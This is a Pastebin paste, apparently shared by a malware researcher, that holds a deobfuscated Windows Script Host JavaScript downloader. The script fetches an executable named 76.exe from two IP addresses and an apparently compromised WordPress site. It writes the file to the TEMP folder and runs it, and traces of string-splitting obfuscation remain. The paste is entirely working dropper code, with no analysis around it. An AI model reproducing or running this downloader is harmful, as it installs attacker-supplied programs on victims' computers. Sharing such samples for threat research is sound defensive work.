SHARE
TWEET

Malicious deobfuscated Javascript

dynamoo Dec 2nd, 2015 199 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.  
  3.  
  4.  
  5. var b = "74.117.183.84/76.exe? 5.39.222.193/76.exe? bestsurfinglessons.com/wp-includes/theme-compat/76.exe?".split(" ");
  6.  
  7. var sdf =((1/*s147385184596n118641uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
  8.  
  9. var ws = WScript.CreateObject(sdf);
  10.  
  11. var fd = "%TEMP%\\";
  12.  
  13. var fn = ws.ExpandEnvironmentStrings(fd);
  14.  
  15. var bim = "2.XMLH";
  16.  
  17. var poh = bim + "TTP";
  18.  
  19. var as = true  , sdfs = "ADOD";
  20.  
  21. var xo = WScript.CreateObject("MS"+"XML"+(731708, poh));
  22.  
  23. var xa = WScript.CreateObject(sdfs + "B.St"+(528642, "ream"));
  24.  
  25. var ld = 0;
  26.  
  27. var n = 1;
  28.  
  29. for (var i=ld; i<b.length; i++)  {
  30.  
  31.   var dn = 0;
  32.  
  33.   try  {
  34.  
  35.         poi = "GET";     
  36.  
  37.     xo.open(poi,"http://"+b[i]+n, false); xo.send(); if (xo.status == 100+100)  {
  38.  
  39.       xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 201000-1000)  {
  40.  
  41.         dn = 1; xa.position = 0; xa.saveToFile/*d734115s*/(fn/*d838759s*/+n+".exe",4-2); try  {
  42.  
  43.           if (((new Date())>0,7610363888)) {
  44.  
  45.                     ws./*d205333s*/Run(fn+n+/*d743033s*/".exe",/*d703850s*/3-2,0);
  46.  
  47.                     break;
  48.  
  49.           }
  50.  
  51.                 }
  52.  
  53.         catch (er)  {
  54.  
  55.                 };
  56.  
  57.       }; xa.close();
  58.  
  59.     };
  60.  
  61.         if (dn == 1)  {
  62.  
  63.       ld = i; break;
  64.  
  65.     };
  66.  
  67.   }
  68.  
  69.   catch (er)  {
  70.  
  71.   };
  72.  
  73. };
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top